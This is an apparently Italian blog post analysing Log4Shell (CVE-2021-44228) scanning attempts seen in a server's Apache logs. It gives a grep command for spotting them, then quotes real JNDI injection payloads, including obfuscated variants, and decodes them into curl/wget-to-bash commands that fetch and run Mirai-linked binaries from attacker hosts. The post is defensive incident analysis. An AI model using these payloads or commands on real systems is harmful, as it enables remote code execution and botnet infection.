Log4J

 rapido controllo su un server....il problema decisamente esiste

stringa di scansione dei log (ripresa da qui)

egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

questo il risultato...la cosa interessante e' che vi sono diverse tipologie di codici di cui si tenta l'esecuzione

/var/log/apache2/access.log.1:167.71.13.196 - - [11/Dec/2021:10:04:25 +0100] "GET /$%7Bjndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b%7D?${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b}=${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b} HTTP/1.1" 404 515 "-" "${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b}"

/var/log/apache2/access.log.1:167.71.13.196 - - [11/Dec/2021:18:32:33 +0100] "GET /$%7Bjndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b%7D?${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b}=${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b} HTTP/1.1" 404 515 "-" "${jndi:ldaps://fd85971c.probe001.log4j.leakix.net:9200/b}"

/var/log/apache2/access.log.1:194.163.163.20 - - [11/Dec/2021:22:13:07 +0100] "GET /?x=${jndi:ldap://${hostName}.c6qgldh5g22l07bu1lvgcg4tesaybpakh.interactsh.com/a} HTTP/1.1" 200 3343 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qgldh5g22l07bu1lvgcg4tesaybpakh.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qgldh5g22l07bu1lvgcg4tesaybpakh.interactsh.com}"

/var/log/apache2/access.log.1:147.182.216.21 - - [12/Dec/2021:00:35:18 +0100] "GET / HTTP/1.1" 200 3324 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"

/var/log/apache2/access.log.1:45.155.205.233 - - [12/Dec/2021:06:21:38 +0100] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MCl8YmFzaA==} HTTP/1.1" 200 3343 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xNTAuMjE3LjczLjEwODo4MCl8YmFzaA==}"

decodificando la stringa Base64 si ha il comando per accesso shell

(curl -s 45.155.205.233:5874/150.217.xxx.xxx:80||wget -q -O-45.155.205.233:5874/150.217.xxx.xxx:80)|bash

in altri casi la decodifica della stringa base64 riporta a 

wget http://xxx.xxxx.xxx.xxx/lh.sh;chmod +x lh.sh;./lh

che scarica ed esegue uno script di shlle che contiene

wget http://xxx.xxx.xxx.xxx/web/admin/x86;chmod +x x86;./x86 x86;

wget http://xxx.xxx.xxx.xxx/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;

wget http://xxx.xxx.xxx.xxx/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;

che scarica e mette in esecuzione dei file binari (Virustotal li riconosce come appartenenti a Mirai)

Aggiornamento

oggi e' stata rilevata la seguente stringa nei log

/var/log/apache2/access.log:45.56.80.11 - - [15/Dec/2021:17:27:09 +0100] "GET / HTTP/1.1" 200 10975 "-" "${jndi:ldap://162.55.90.26/2530822508/C}"

/var/log/apache2/access.log.1:13.72.102.159 - - [14/Dec/2021:15:01:45 +0100] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 481 "-" "curl/7.58.0"

questo codice e' relativo al ransomware Mushtik (per la spiegazione completa qui)

aggiornamento con variante

/var/log/apache2/access.log.1:45.56.80.11 - - [15/Dec/2021:17:27:09 +0100] "GET / HTTP/1.1" 200 10975 "-" "${jndi:ldap://162.55.90.26/2530822508/C}"

/var/log/apache2/access.log.1:107.189.29.181 - - [19/Dec/2021:15:19:44 +0100] "GET / HTTP/1.1" 200 3343 "-" "${jndi:ldap://179.43.175.101:1389/jedmdg}" botnet